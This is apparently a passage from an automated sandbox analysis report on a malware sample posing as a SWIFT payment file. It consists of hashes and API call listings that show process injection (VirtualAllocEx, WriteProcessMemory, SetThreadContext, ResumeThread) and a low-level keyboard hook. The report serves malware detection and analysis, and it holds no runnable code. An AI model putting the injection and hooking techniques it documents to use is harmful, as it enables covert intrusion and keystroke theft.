                                                                                        • Source File: 00000001.00000002.523474830.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_d70000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: 79b2262bd969ce490d51f2f455d30ef5f6c03868a62fcda4cc885928eeeb0632
                                                                                        • Instruction ID: 7c49ab0f5560c8dda93aa4987f65a2fd0da481ef7945aafc210e3e4d2075f14c
                                                                                        • Opcode Fuzzy Hash: 79b2262bd969ce490d51f2f455d30ef5f6c03868a62fcda4cc885928eeeb0632
                                                                                        • Instruction Fuzzy Hash: 33414AB1D00318DFDB11DF99C88579EBBF1EB48304F148129E819AB741E7749885CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 1065 d7e2c8-d7e31a 1068 d7e326-d7e358 SetWindowsHookExW 1065->1068 1069 d7e31c 1065->1069 1070 d7e361-d7e386 1068->1070 1071 d7e35a-d7e360 1068->1071 1072 d7e324 1069->1072 1071->1070 1072->1068
                                                                                        APIs
                                                                                        • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 00D7E34B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.523474830.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_d70000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID: HookWindows
                                                                                        • String ID:
                                                                                        • API String ID: 2559412058-0
                                                                                        • Opcode ID: e342a9830bec97ae74cbc6977fadff3a310e50fc021dc6c7caa47f9127909b38
                                                                                        • Instruction ID: 70bc3c1e50892807444431a8a3b4168779c8153aaffc6baa48fa7b29766eaea2
                                                                                        • Opcode Fuzzy Hash: e342a9830bec97ae74cbc6977fadff3a310e50fc021dc6c7caa47f9127909b38
                                                                                        • Instruction Fuzzy Hash: 872129B1D00209DFDB14CFA9D844BEEBBF5BF88320F14856AD469A7290D774A944CFA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        control_flow_graph 1076 d7e2d0-d7e31a 1078 d7e326-d7e358 SetWindowsHookExW 1076->1078 1079 d7e31c 1076->1079 1080 d7e361-d7e386 1078->1080 1081 d7e35a-d7e360 1078->1081 1082 d7e324 1079->1082 1081->1080 1082->1078
                                                                                        APIs
                                                                                        • SetWindowsHookExW.USER32(?,00000000,?,?), ref: 00D7E34B
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.523474830.0000000000D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D70000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_d70000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID: HookWindows
                                                                                        • String ID:
                                                                                        • API String ID: 2559412058-0
                                                                                        • Opcode ID: 2b19afb9c444f1bbcd91a997045d4e432e51ead9b5fa1139c105b84726ea9555
                                                                                        • Instruction ID: 394c237f76477f5635a8c7e24d405a30e49e5b9d27633c458a21542526e5ea78
                                                                                        • Opcode Fuzzy Hash: 2b19afb9c444f1bbcd91a997045d4e432e51ead9b5fa1139c105b84726ea9555
                                                                                        • Instruction Fuzzy Hash: D02115B1D002099FDB14DFAAD844BEEBBF5BF88310F148429E459A7250D774A944CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.549067277.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6b40000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 13864740458b707a3bd3b24c04830706c3b357dc7dd90ec1a3272d3ef3ed98ab
                                                                                        • Instruction ID: acbd0fc4d1b1c1362a2bcc20c03751320b3703caa4c4d02181b48dadc848961c
                                                                                        • Opcode Fuzzy Hash: 13864740458b707a3bd3b24c04830706c3b357dc7dd90ec1a3272d3ef3ed98ab
                                                                                        • Instruction Fuzzy Hash: 18C1B0B49046669FCB56EB28C4C0EBCFBB1FF09310B198195D5A997616C330F891DBA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.549067277.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6b40000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 7e983905b0e20708ee3e6bd2d1479734262fca5b5ecf79057b3e979cff44b587
                                                                                        • Instruction ID: b07fe38e9e44c1a367a5e88344db9a6c6ee964588db12be94d161a17e99354fa
                                                                                        • Opcode Fuzzy Hash: 7e983905b0e20708ee3e6bd2d1479734262fca5b5ecf79057b3e979cff44b587
                                                                                        • Instruction Fuzzy Hash: 87A1E6B0E002598FDF54EF99C8447AEBBB6FF88310F1481A9E411A7395CB745982EF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.549067277.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6b40000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: d201d3031c49f5c1fe4d4ec830078a5bb58e9ab3a3b00c213324b01773f98b31
                                                                                        • Instruction ID: c66d0997ea048a8b9758ae61e1e5d674dfc355faeec99b9cd243164746168a71
                                                                                        • Opcode Fuzzy Hash: d201d3031c49f5c1fe4d4ec830078a5bb58e9ab3a3b00c213324b01773f98b31
                                                                                        • Instruction Fuzzy Hash: CA810471D002019FC7A0DF6DC8809AABBF5FF89310B1985EAD458DB612E735EC42CBA0
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.549067277.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6b40000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 2d999fc60b22cc0265ba1f7cf6892ed5e1cc756b5d3cf4a31ddef8adafb48539
                                                                                        • Instruction ID: eea40a22f7ca32ad23fb8232313ee1613c6e8c39c8ccc9e34ba38a877cb90658
                                                                                        • Opcode Fuzzy Hash: 2d999fc60b22cc0265ba1f7cf6892ed5e1cc756b5d3cf4a31ddef8adafb48539
                                                                                        • Instruction Fuzzy Hash: 5871AAB0E04258CFCB50EF58C884ABEBBB5FF89314F15819AD444AB312D335A996DF90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 00000001.00000002.549067277.0000000006B40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06B40000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_1_2_6b40000_SWIFT_USD_165092.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: ec191dc7eb68978ae5485da12b72d9b33be8cf8ee42e365fc0c79823b0c316a9
                                                                                        • Instruction ID: acf05c2493963d1b55526690b1524fa83ff5df37746f215a05628fdc054ad6d6
                                                                                        • Opcode Fuzzy Hash: ec191dc7eb68978ae5485da12b72d9b33be8cf8ee42e365fc0c79823b0c316a9
                                                                                        • Instruction Fuzzy Hash: 5831E6757106148FEB69BB29D898A2E7BF6FBD8311B148558FA4787740CF34A902DF40
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage:23%
                                                                                        Dynamic/Decrypted Code Coverage:100%
                                                                                        Signature Coverage:0%
                                                                                        Total number of Nodes:75
                                                                                        Total number of Limit Nodes:2
                                                                                        execution_graph: node/edge dump omitted. The graph shows one call chain rooted at 5a60448 that resolves 12 API calls, among them CreateProcessAsUserA, ReadProcessMemory, VirtualAllocEx, WriteProcessMemory, SetThreadContext and ResumeThread (the process-injection sequence flagged under "Injects a PE file into a foreign processes").

Control-flow Graph
[Graph image: basic blocks 5a65014-5a653b0, colored executed / not executed; the CreateProcessAsUserA call is in block 5a6520a-5a652c6]
APIs
• CreateProcessAsUserA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 05A652B3
Strings
Memory Dump Source
• Source File: 0000000B.00000002.451141243.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5a60000_svchost.jbxd
Similarity
• API ID: CreateProcessUser
• String ID: uyQ$uyQ
• API String ID: 2217836671-669395725
• Opcode ID: b89dfe4f4368dfb4b7a682572db69d05f28485bddf4021c725dad805088798e0
• Instruction ID: f2508c46563c9ccc29439ceaf7461d34940af09dec4007a6a36393a80f9a8f31
• Opcode Fuzzy Hash: b89dfe4f4368dfb4b7a682572db69d05f28485bddf4021c725dad805088798e0
• Instruction Fuzzy Hash: D6A15C71E002199FDB10DFA9C885BDDBBF2FF48304F4481A9E869A7290E7749985CF91
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
[Graph image: basic blocks 5a65020-5a653b0, colored executed / not executed; the CreateProcessAsUserA call is in block 5a6520a-5a652c6]
APIs
• CreateProcessAsUserA.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 05A652B3
Strings
Memory Dump Source
• Source File: 0000000B.00000002.451141243.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5a60000_svchost.jbxd
Similarity
• API ID: CreateProcessUser
• String ID: uyQ$uyQ
• API String ID: 2217836671-669395725
• Opcode ID: 3d8b97baa9907c67e595f38b2d0a00ea5991f9020a94e947c00179e5011fe757
• Instruction ID: 515b7ed1ad1cac7ab87d3c8b8c6758c6d0bf60c2f55d2f0f5e0696278c99a9d4
• Opcode Fuzzy Hash: 3d8b97baa9907c67e595f38b2d0a00ea5991f9020a94e947c00179e5011fe757
• Instruction Fuzzy Hash: CAA16C71E002199FDB10DFA9C845BDDBBF2FF48704F4481A9E829A7290EB749985CF91
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
[Graph image: basic blocks 5a656a8-5a65774, colored executed / not executed; the WriteProcessMemory call is in block 5a65711-5a6574a]
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05A6573D
Strings
Memory Dump Source
• Source File: 0000000B.00000002.451141243.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5a60000_svchost.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID: uyQ
• API String ID: 3559483778-426589555
• Opcode ID: 981bf717698821d40ba24df18954afaa07064680296734abe3d48e57dba277d3
• Instruction ID: 5b4cc972f064439912adbc8966d668b83c23c3a556228651c81f71348f8282df
• Opcode Fuzzy Hash: 981bf717698821d40ba24df18954afaa07064680296734abe3d48e57dba277d3
• Instruction Fuzzy Hash: 5C21E5B5D00249DFCB10CFAAD885BDEBBF4FB48310F54842AE919A7250D778A944CBA5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
[Graph image: basic blocks 5a656b0-5a65774, colored executed / not executed; the WriteProcessMemory call is in block 5a65711-5a6574a]
APIs
• WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 05A6573D
Strings
Memory Dump Source
• Source File: 0000000B.00000002.451141243.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5a60000_svchost.jbxd
Similarity
• API ID: MemoryProcessWrite
• String ID: uyQ
• API String ID: 3559483778-426589555
• Opcode ID: a1a8cadc1620647534b22252c66312f32cc4c3576eba15e334d834a47ba6115c
• Instruction ID: 9b3656ead3651e0959cc75f9cb8bb77f5dd8b52198d2664051b242547faadaec
• Opcode Fuzzy Hash: a1a8cadc1620647534b22252c66312f32cc4c3576eba15e334d834a47ba6115c
• Instruction Fuzzy Hash: FC21E4B5D00249DFCB10CF9AD884BDEBBF4FB48310F50842AE919A7250D778A944CFA5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
[Graph image: basic blocks 5a65450-5a65506, colored executed / not executed; the SetThreadContext call is in block 5a654b0-5a654dc]
APIs
• SetThreadContext.KERNELBASE(?,00000000), ref: 05A654CF
Strings
Memory Dump Source
• Source File: 0000000B.00000002.451141243.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5a60000_svchost.jbxd
Similarity
• API ID: ContextThread
• String ID: uyQ
• API String ID: 1591575202-426589555
• Opcode ID: 3c3aaa09c43b6617741df04015122512337b6c190a4d0b50e69994f986647847
• Instruction ID: ae9c272d448bd2b83b86762cb9a876a8d3494bdef52ba01e55919b69ebf4fded
• Opcode Fuzzy Hash: 3c3aaa09c43b6617741df04015122512337b6c190a4d0b50e69994f986647847
• Instruction Fuzzy Hash: 252127B1D0061A9FCB10CF9AC985BDEFBF4BB48320F548169E418B3640D778A9448FA5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
[Graph image: basic blocks 5a65510-5a655c5, colored executed / not executed; the ReadProcessMemory call is in block 5a65510-5a6559b]
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05A6558E
Strings
Memory Dump Source
• Source File: 0000000B.00000002.451141243.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5a60000_svchost.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID: uyQ
• API String ID: 1726664587-426589555
• Opcode ID: 3b650a1eade7a40355222d491ab67a8e93c9e37949a7b749a52f93e088b352af
• Instruction ID: c7177f4ba480f452e3b3ef2c31b63efe466e380794a624651bc6d3fe9cd8e8f0
• Opcode Fuzzy Hash: 3b650a1eade7a40355222d491ab67a8e93c9e37949a7b749a52f93e088b352af
• Instruction Fuzzy Hash: 392108B6D006499FCB10CF9AC884BDEBBF4FF48320F548429E459A7250D778A544DFA1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
[Graph image: basic blocks 5a65458-5a65506, colored executed / not executed; the SetThreadContext call is in block 5a654b0-5a654dc]
APIs
• SetThreadContext.KERNELBASE(?,00000000), ref: 05A654CF
Strings
Memory Dump Source
• Source File: 0000000B.00000002.451141243.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5a60000_svchost.jbxd
Similarity
• API ID: ContextThread
• String ID: uyQ
• API String ID: 1591575202-426589555
• Opcode ID: 8f7aad18914c1f57676bc0bd5d3fc01a61bc274f7f593a1311b41d2749b86fa0
• Instruction ID: c3c3f1a3a2a6354cedd171e164f67ab499e885d7acddd6df4b9d5d25ba1c9435
• Opcode Fuzzy Hash: 8f7aad18914c1f57676bc0bd5d3fc01a61bc274f7f593a1311b41d2749b86fa0
• Instruction Fuzzy Hash: 292106B1D0061A9FCB10CF9AC984BDEFBF4BB48720F54816AD518B7640D778A9448FA5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
[Graph image: basic blocks 5a65518-5a655c5, colored executed / not executed; the ReadProcessMemory call is in block 5a65518-5a6559b]
APIs
• ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 05A6558E
Strings
Memory Dump Source
• Source File: 0000000B.00000002.451141243.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5a60000_svchost.jbxd
Similarity
• API ID: MemoryProcessRead
• String ID: uyQ
• API String ID: 1726664587-426589555
• Opcode ID: a4a231d6bdf210c1cd380f73af459b1cbc89856840f9fe6e99b6bf7455a54d31
• Instruction ID: e8c91a76b336355ec8278340c8ab9cd155e7a9b08eb3515afddfc50b26a7ed72
• Opcode Fuzzy Hash: a4a231d6bdf210c1cd380f73af459b1cbc89856840f9fe6e99b6bf7455a54d31
• Instruction Fuzzy Hash: C52106B5D002499FCB10CF9AC884BDEBBF4FF48320F508429E459A7250D378A644DFA1
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
[Graph image: basic blocks 5a65600-5a6569d, colored executed / not executed; the VirtualAllocEx call is in block 5a65600-5a65680]
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05A65673
Strings
Memory Dump Source
• Source File: 0000000B.00000002.451141243.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5a60000_svchost.jbxd
Similarity
• API ID: AllocVirtual
• String ID: uyQ
• API String ID: 4275171209-426589555
• Opcode ID: 3a9b0a780561986fd9d481a1df63c2bd0236594377640575756aa8bc0960e2ae
• Instruction ID: 7bbc09b380aadae582a9d682396955bb6560a6c4d11d935ecbd3ff055f68165d
• Opcode Fuzzy Hash: 3a9b0a780561986fd9d481a1df63c2bd0236594377640575756aa8bc0960e2ae
• Instruction Fuzzy Hash: F71125BA8006499FCB10CF9AC884BDEBFF4FB48320F148459E529A7210C375A944CFA5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
[Graph image: basic blocks 5a65608-5a6569d, colored executed / not executed; the VirtualAllocEx call is in block 5a65608-5a65680]
APIs
• VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 05A65673
Strings
Memory Dump Source
• Source File: 0000000B.00000002.451141243.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5a60000_svchost.jbxd
Similarity
• API ID: AllocVirtual
• String ID: uyQ
• API String ID: 4275171209-426589555
• Opcode ID: 69cfe1a343c970e7dfa617c18c587fcfd32cd9e63b9001d03881a4e0560e52a2
• Instruction ID: eb89ef7b9d63cb9e5bb351548d1b86f510ddb0466720688b816281a8a244d07c
• Opcode Fuzzy Hash: 69cfe1a343c970e7dfa617c18c587fcfd32cd9e63b9001d03881a4e0560e52a2
• Instruction Fuzzy Hash: 111122B58002499FCB10CF9AC884BDEBFF4FB48320F248429E529A7210C375A944CFA5
Uniqueness

Uniqueness Score: -1.00%

Control-flow Graph
[Graph image: basic blocks 5a657e0-5a65871, colored executed / not executed; the ResumeThread call is in block 5a657e0-5a65854]
APIs
Strings
Memory Dump Source
• Source File: 0000000B.00000002.451141243.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_5a60000_svchost.jbxd
Similarity
• API ID: ResumeThread
• String ID: uyQ
• API String ID: 947044025-426589555
• Opcode ID: f54831b8502c1e0608fdfd060db39e32ff67321b88567ab9328885228d32869a
• Instruction ID: 63d0e66c8211df8a50d9753b464f88e4e194fc753f0aca7d8a41cce872f60d7d
• Opcode Fuzzy Hash: f54831b8502c1e0608fdfd060db39e32ff67321b88567ab9328885228d32869a
• Instruction Fuzzy Hash: A41133B5C002098FCB20CFAAD584BDEBFF4EB48324F20846AD419B7600C774A944CFA5
Uniqueness

Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.451141243.0000000005A60000.00000040.00000800.00020000.00000000.sdmp, Offset: 05A60000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_5a60000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: ResumeThread
                                                                                        • String ID: uyQ
                                                                                        • API String ID: 947044025-426589555
                                                                                        • Opcode ID: 57b101e6f3aa7700b8538b3db845450e36a41aa709019ce996e5a907fc9d84ce
                                                                                        • Instruction ID: f150f1bc77e3973c87a52b4d015f9459d97eca9bd75bbf6689124f56b75d4bdd
                                                                                        • Opcode Fuzzy Hash: 57b101e6f3aa7700b8538b3db845450e36a41aa709019ce996e5a907fc9d84ce
                                                                                        • Instruction Fuzzy Hash: 3C1112B5C002498FCB20CF9AD584BDEBFF4EB48320F20846AD519A7640C774A944CFA5
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Execution Graph

                                                                                        Execution Coverage: 15.6%
                                                                                        Dynamic/Decrypted Code Coverage: 100%
                                                                                        Signature Coverage: 15.8%
                                                                                        Total number of Nodes:19
                                                                                        Total number of Limit Nodes:0
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.651016367.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_14d0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID: .
                                                                                        • API String ID: 0-248832578
                                                                                        • Opcode ID: 63567e5525b36cd33c558793604f83aa868fe52993360fec28a3afc4aeaf234c
                                                                                        • Instruction ID: 90c55ab613adccc94fa551e452ced44eb54fe5b6692744ae2ca571f5753fa8ec
                                                                                        • Opcode Fuzzy Hash: 63567e5525b36cd33c558793604f83aa868fe52993360fec28a3afc4aeaf234c
                                                                                        • Instruction Fuzzy Hash: 1C72A270A10255CFDF25CF28C890BADBBB2BF45310F1881AAD9499B3A6D7749D81CF91
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 053BEA83
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.665992057.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_53b0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: HookWindows
                                                                                        • String ID:
                                                                                        • API String ID: 2559412058-0
                                                                                        • Opcode ID: 6ff1742d92845982f312b0e04eb38ef3ace78af3dd4c5641ecadacf9d3c1b505
                                                                                        • Instruction ID: 700c84f5ec68ec8f7926183501c66bbee4db7ba5b922e7eaaf1690ecc8658361
                                                                                        • Opcode Fuzzy Hash: 6ff1742d92845982f312b0e04eb38ef3ace78af3dd4c5641ecadacf9d3c1b505
                                                                                        • Instruction Fuzzy Hash: 0D2115B5D002099FDB10DF9AD844BEEBBF9FB88310F108429E419A7650CBB4A944DFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.651016367.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_14d0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 610ef5753ef235c7c2a47c594e8397b1bd531475f67649fc7c3ed9e3c6dc5fb2
                                                                                        • Instruction ID: 5c9295a7f0ffb74e22fda86a9b19e5d67368bdb33293dc0139a2c609f9ce0257
                                                                                        • Opcode Fuzzy Hash: 610ef5753ef235c7c2a47c594e8397b1bd531475f67649fc7c3ed9e3c6dc5fb2
                                                                                        • Instruction Fuzzy Hash: 35A2BC70A00214CFDB24CB18C994FA9BBF2AF45305F1881EAD5999B366C7B5ED85CF50
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.665992057.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_53b0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: a8631a0ede5f66954943db459879abfce3c77f1a69544a4cc6c1fd8cf8024669
                                                                                        • Instruction ID: cdafa580a8d1e9368ecd74201df162746f18cb0aac6de4dbb988c4d771213c92
                                                                                        • Opcode Fuzzy Hash: a8631a0ede5f66954943db459879abfce3c77f1a69544a4cc6c1fd8cf8024669
                                                                                        • Instruction Fuzzy Hash: 654136B0D106198FEF10CFA9C8847DEBBF2BB48304F108529E915AB781D7B89842CF95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.665992057.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_53b0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: LibraryLoad
                                                                                        • String ID:
                                                                                        • API String ID: 1029625771-0
                                                                                        • Opcode ID: 1139b7a1de9661452dcafd0c4f07c01bb3eb695f1b8daa060244aa2643ee5c55
                                                                                        • Instruction ID: c4840b1b2443fe11f185c189da6a4383e900798d43c5ad6eb662c7b65b49db2e
                                                                                        • Opcode Fuzzy Hash: 1139b7a1de9661452dcafd0c4f07c01bb3eb695f1b8daa060244aa2643ee5c55
                                                                                        • Instruction Fuzzy Hash: A04125B0D106189FEF10CFA9C8857DEBBF2BB48304F108529E915ABB41D7B89842CF95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        APIs
                                                                                        • SetWindowsHookExW.USER32(0000000D,00000000,?,?), ref: 053BEA83
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.665992057.00000000053B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 053B0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_53b0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID: HookWindows
                                                                                        • String ID:
                                                                                        • API String ID: 2559412058-0
                                                                                        • Opcode ID: 44d6fea265367e05fe419fd84e78abe49b6a284fd80f19aaf2b0e300e1921442
                                                                                        • Instruction ID: 9683593d19d116425c19c9321606004b3a9d700ab3d9961a50cd72a86dc6d694
                                                                                        • Opcode Fuzzy Hash: 44d6fea265367e05fe419fd84e78abe49b6a284fd80f19aaf2b0e300e1921442
                                                                                        • Instruction Fuzzy Hash: CB2115B5D002099FDB10DF9AD844BDEBBF9FB88310F10842AE419A7650CBB4A944DFA4
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.651016367.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_14d0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: 77a2cd8e2adbf9ec60b0f3802fcc89e39e13ca334c34fa43a58c6cb933c58385
                                                                                        • Instruction ID: 03c3fb9d4672ab1d2d7754394f119df3671e58eb61aa5f3addd57fe5f62b942c
                                                                                        • Opcode Fuzzy Hash: 77a2cd8e2adbf9ec60b0f3802fcc89e39e13ca334c34fa43a58c6cb933c58385
                                                                                        • Instruction Fuzzy Hash: 01622A34A006168FCB15CF58D690AAEF7F2FF45310F69855AE449AB222D331FC86CB95
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        Control-flow Graph

                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000E.00000002.651016367.00000000014D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 014D0000, based on PE: false
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_14_2_14d0000_svchost.jbxd
                                                                                        Similarity
                                                                                        • API ID:
                                                                                        • String ID:
                                                                                        • API String ID:
                                                                                        • Opcode ID: be3f1c22549a7cba45e99d8f4e330e9fcb03b43f5cd19ba7e2e47b1bb9dc8739
                                                                                        • Instruction ID: 134c4892a008c7b84075ea7dbf15e67176431c5f2139f1c49b9249aa05bdf4cf
                                                                                        • Opcode Fuzzy Hash: be3f1c22549a7cba45e99d8f4e330e9fcb03b43f5cd19ba7e2e47b1bb9dc8739
